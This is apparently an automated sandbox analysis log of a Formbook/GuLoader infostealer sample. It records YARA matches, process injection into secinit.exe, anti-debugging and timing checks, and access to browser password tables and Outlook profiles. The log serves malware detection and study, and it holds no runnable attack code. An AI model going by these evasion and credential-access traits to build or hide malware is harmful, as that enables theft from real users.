        Source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/22@21/14
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_0040442A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_0040442A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_00402036 CoCreateInstance,MultiByteToWideChar,5_2_00402036
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeFile created: C:\Users\user\AppData\Local\Lumbagoen.lnkJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeFile created: C:\Users\user\AppData\Local\Temp\nssB994.tmpJump to behavior
        Source: fJuwM4Bwi7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: secinit.exe, 0000000A.00000003.79359965407.0000000002828000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79359811784.0000000002807000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83832065091.0000000002828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: fJuwM4Bwi7.exeReversingLabs: Detection: 52%
        Source: fJuwM4Bwi7.exeVirustotal: Detection: 55%
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeFile read: C:\Users\user\Desktop\fJuwM4Bwi7.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\fJuwM4Bwi7.exe "C:\Users\user\Desktop\fJuwM4Bwi7.exe"
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeProcess created: C:\Users\user\Desktop\fJuwM4Bwi7.exe "C:\Users\user\Desktop\fJuwM4Bwi7.exe"
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"
        Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeProcess created: C:\Users\user\Desktop\fJuwM4Bwi7.exe "C:\Users\user\Desktop\fJuwM4Bwi7.exe"Jump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Lumbagoen.lnk.5.drLNK file: ..\..\..\..\Windows\system32\scups\deployerende.emb
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\secinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: fJuwM4Bwi7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101394291.0000000000A2E000.00000002.00000001.01000000.0000000A.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83830927716.0000000000A2E000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: secinit.pdbGCTL source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000267E000.00000004.00000020.00020000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832206009.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: fJuwM4Bwi7.exe, 00000008.00000003.79086644486.0000000032739000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79082655954.000000003258A000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002D2D000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79182431961.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79178692892.00000000028A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: fJuwM4Bwi7.exe, fJuwM4Bwi7.exe, 00000008.00000003.79086644486.0000000032739000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79082655954.000000003258A000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002D2D000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79182431961.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79178692892.00000000028A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: secinit.pdb source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000267E000.00000004.00000020.00020000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832206009.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000005.00000002.79055979562.0000000004FBC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_00406061 GetModuleHandleA,LoadLibraryA,GetProcAddress,5_2_00406061
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_10002D30 push eax; ret 5_2_10002D5E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_328EE060 push eax; retf 0008h8_2_328EE06D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_328EE074 pushfd ; retf 8_2_328EE075
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_328E21AD pushad ; retf 0004h8_2_328E223F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_328E97A1 push es; iretd 8_2_328E97A8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329108CD push ecx; mov dword ptr [esp], ecx8_2_329108D6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeFile created: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951763 rdtsc 8_2_32951763
        Source: C:\Windows\SysWOW64\secinit.exeWindow / User API: threadDelayed 9014Jump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeAPI coverage: 0.2 %
        Source: C:\Windows\SysWOW64\secinit.exe TID: 768Thread sleep count: 121 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\secinit.exe TID: 768Thread sleep time: -242000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exe TID: 768Thread sleep count: 9014 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\secinit.exe TID: 768Thread sleep time: -18028000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\secinit.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_0040603A FindFirstFileA,FindClose,5_2_0040603A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_004055F6 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004055F6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_00402645 FindFirstFileA,5_2_00402645
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000263E000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083772422.0000000002688000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83832592696.000000000136F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.79471496024.000001A4E29BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeAPI call chain: ExitProcess graph end nodegraph_5-4273
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeAPI call chain: ExitProcess graph end nodegraph_5-4435
        Source: C:\Windows\SysWOW64\secinit.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\secinit.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951763 rdtsc 8_2_32951763
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329534E0 NtCreateMutant,LdrInitializeThunk,8_2_329534E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_00406061 GetModuleHandleA,LoadLibraryA,GetProcAddress,5_2_00406061
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32917290 mov eax, dword ptr fs:[00000030h]8_2_32917290
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32917290 mov eax, dword ptr fs:[00000030h]8_2_32917290
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32917290 mov eax, dword ptr fs:[00000030h]8_2_32917290
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E289 mov eax, dword ptr fs:[00000030h]8_2_3298E289
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290C2B0 mov ecx, dword ptr fs:[00000030h]8_2_3290C2B0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329EB2BC mov eax, dword ptr fs:[00000030h]8_2_329EB2BC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329EB2BC mov eax, dword ptr fs:[00000030h]8_2_329EB2BC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329EB2BC mov eax, dword ptr fs:[00000030h]8_2_329EB2BC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329EB2BC mov eax, dword ptr fs:[00000030h]8_2_329EB2BC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF2AE mov eax, dword ptr fs:[00000030h]8_2_329CF2AE
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D92AB mov eax, dword ptr fs:[00000030h]8_2_329D92AB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329342AF mov eax, dword ptr fs:[00000030h]8_2_329342AF
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329342AF mov eax, dword ptr fs:[00000030h]8_2_329342AF
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329092AF mov eax, dword ptr fs:[00000030h]8_2_329092AF
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329432C0 mov eax, dword ptr fs:[00000030h]8_2_329432C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329432C0 mov eax, dword ptr fs:[00000030h]8_2_329432C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329332C5 mov eax, dword ptr fs:[00000030h]8_2_329332C5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E32C9 mov eax, dword ptr fs:[00000030h]8_2_329E32C9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329202F9 mov eax, dword ptr fs:[00000030h]8_2_329202F9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329202F9 mov eax, dword ptr fs:[00000030h]8_2_329202F9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329202F9 mov eax, dword ptr fs:[00000030h]8_2_329202F9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329202F9 mov eax, dword ptr fs:[00000030h]8_2_329202F9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329202F9 mov eax, dword ptr fs:[00000030h]8_2_329202F9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329202F9 mov eax, dword ptr fs:[00000030h]8_2_329202F9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329202F9 mov eax, dword ptr fs:[00000030h]8_2_329202F9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329202F9 mov eax, dword ptr fs:[00000030h]8_2_329202F9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329072E0 mov eax, dword ptr fs:[00000030h]8_2_329072E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A2E0 mov eax, dword ptr fs:[00000030h]8_2_3291A2E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A2E0 mov eax, dword ptr fs:[00000030h]8_2_3291A2E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A2E0 mov eax, dword ptr fs:[00000030h]8_2_3291A2E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A2E0 mov eax, dword ptr fs:[00000030h]8_2_3291A2E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A2E0 mov eax, dword ptr fs:[00000030h]8_2_3291A2E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A2E0 mov eax, dword ptr fs:[00000030h]8_2_3291A2E0
